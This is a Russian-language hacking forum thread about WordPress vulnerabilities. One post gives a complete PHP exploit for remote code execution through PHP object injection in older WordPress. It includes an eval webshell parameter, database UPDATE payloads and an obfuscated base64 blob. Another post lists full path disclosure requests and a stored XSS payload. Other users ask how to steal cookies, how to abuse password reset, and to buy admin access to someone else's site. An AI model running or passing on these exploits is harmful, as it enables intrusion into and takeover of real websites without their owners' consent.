[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. Logos21

    Logos21 New Member

    Joined:
    1 Apr 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Всем привет, никто не находил уязвимости в вп 4.4.5?
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _________________________
  3. abrakadabra

    abrakadabra New Member

    Joined:
    31 Dec 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    WordPress Version 4.6.1
    google-capcha
    contact form 7
    что можно сделать подскажите .
     
  4. SnoopDog007

    SnoopDog007 New Member

    Joined:
    2 Jan 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Есть сайт на нем проверенная CVE-2015-4566, как можно увести куки?
    Wordpress 4.3.1
     
  5. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    shell_c0de likes this.
  6. pav1uxa

    pav1uxa New Member

    Joined:
    3 Jan 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Wordpress < 4.6.1 RCE through PHP Object Injection by direct DB access

    От автора:
    От себя:
    Как я понял, это способ заливки шелла, когда есть доступ к БД, но нет доступа к ФС сервера. Меняете поле в БД, получаете выполнение кода на сервера, где запущен WP.

    PHP:
    <?php 

    /* 
     * Wordpress < 4.6.1 RCE through PHP Object Injection by direct DB access 
     * coded by crlf 
     * rdot.org 
     * 
     * http://site.com/wordpress/?rce=phpinfo(); 
     * plural=1);}eval($_REQUEST['rce']);/* 
     *  
     */  

    $ftp "ftp://127.0.0.1"//FTP with anonymous access, only host, without slash 
    $dir "yyyy"//any 
    $file "en_US.mo"//don't change this 
    $option_id 94//recent posts widget in 4.6.1 

    eval(
    class WP_Theme{ 
        private \$headers = array('Name'=>'Foo', 'TextDomain'=>'Bar'); 
        private \$theme_root = '
    $ftp'; 
        private \$stylesheet = '
    $dir'; 

    "
    ); 

    $default 'a:2:{i:2;a:1:{s:5:"title";s:0:"";}s:12:"_multiwidget";i:1;}'
    $arr =  unserialize($default); 
    $arr[2]['title'] = new WP_Theme


    echo 
    "\nPayload: \nUPDATE wp_options SET option_value = 0x".ascii2hex(serialize($arr))." WHERE wp_options.option_id = ".$option_id."\n"

    echo 
    "\nRestore: \nUPDATE wp_options SET option_value = 0x".ascii2hex($default)." WHERE wp_options.option_id = ".$option_id."\n"

    echo 
    "\nCheck it:\n\n$ftp/path/to/anonymous/directory/$dir/languages/$file\n\n";  

    if(!
    file_exists($file)) file_put_contents($filegzdecode(base64_decode('H4sIAAAAAAAAA3VRz08UMRQu4mnkxMGThx40COQxO4uaTTd7EBiQZCcuu7NqYgwpM8/Zkm47aTsESLj5L/jv+V94982OChde8vV9bb/k/fh+bT79ySjWCS8Ib1gX4wf5OSEjPCOUhB9rjNV/338TjyhvPKHjveF4LZe1RvbK/6OefUCtLf9snS7ZxNlLLAKclvAJnVfWCD62heVHuLTRFGvrAmS+UiUcNJWH3AoeTT7mcOhQBpLDkQwoeL+XvIMkgX6fJ2/F/v5uj4KEMMUr5R/VDTrdWPoAuZPGaxmsoxJjaapGVgg5yqXgs1oa5Rf/nwVHD+ksmujGSQ3H1i294KZeXf2oP+QdHSXbwzu8kvr1y/NpejZPZ/nXLVfg1rftYbwTZadZej93steLDq0JaKiZm5qKBLwOca2lMkNeLKTzGEbz/BgG97q26e/oIDWFLZWpBB9cqBB9gXaLMLMNVWu51G3T5nw6p78TNOi6SVfLBr4IofYijnWrVB73LtRtzOZk4CWSa3ZlYEfJQKslzxpTWhb9AQtsWO0xAgAA')));  

    function 
    ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);} 

    ?>
     
  7. abrakadabra

    abrakadabra New Member

    Joined:
    31 Dec 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
  8. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    WordPress 4.6.2 через соседние самописные скрипты имею sql-injection (только просмотр БД)
    Пароли на расшифровке на неизвестное время
    Можно ли как то задействовать функцию восстановления пароля?
    Как привести в нормальный вид хеш содержащиеся в wp_users -> user_activation_key Вида (1484638848:$P$BT9pkNHDgo7gLHb1VaK1MoqYppOuC0) (пару символов неверны), что бы в URL'e указать
     
  9. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    117
    Likes Received:
    29
    Reputations:
    26
    никак. user-activation-key зашифрован так же, как пароль. Он хранился в чистом виде только в древних версиях
     
    kacergei likes this.
  10. amik

    amik New Member

    Joined:
    9 Jan 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    кто нибудь слышал об sql injection от версии 4.7 и ниже.
    как я понял уязвимость находиться wp_query
     
  11. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Баг из разряда гипотетических:

    WP_Query is vulnerable to a SQL injection (SQLi) when passing unsafe data. WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability.

    https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
     
    ACat and Drager like this.
  12. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    195
    Likes Received:
    341
    Reputations:
    47
    Wordpress 4.*.*
    Full Path Disclosure


    wordpress/wp-login.php
    Code:
    POST: log[]=1&pwd[]=1&redirect_to[]=
    wp-json
    Code:
    GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123
    Code:
    Cookie: comment_author_email_dbdee7661db32144cd2347d98b860504[]

    Wordpress 4.7.2
    Stored XSS


    Привилегии: Редактор+

    /wp/wp-comments-post.php

    Code:
    POST: comment="><script>alert('XSS');</script>
    [​IMG]
     
    #352 st55, 8 Feb 2017
    Last edited: 8 Feb 2017
    wowiamserious, -SX-, Ereee and 2 others like this.
  13. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    раскрытие путей работает только через wp-login.php и то редко, wp-json вообще не работает, можно подробней?
     
    #353 mazaxaka, 11 Mar 2017
    Last edited: 12 Mar 2017
  14. loverast

    loverast New Member

    Joined:
    28 Jan 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
  15. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
  16. ArturKonDoil

    ArturKonDoil New Member

    Joined:
    29 Mar 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем доброго времени суток. Нужна помощь в получении доступа к админке WordPress 4.7.3, естественно не бесплатно. Можно в личку.
     
  17. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Работали. Юзал эксполит на добовление админа через SQL inj в каком-то плагине.По 2му вопросу я хз.
     
  18. dzen777

    dzen777 New Member

    Joined:
    31 Mar 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Посоветуйте хороший чекер на уязвимости для WP ?
     
  19. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    wowiamserious likes this.
  20. kolbear

    kolbear New Member

    Joined:
    7 Sep 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте форумчане
    помогите с доступом к пользователям, сайт на WP
    Детальнее в личке.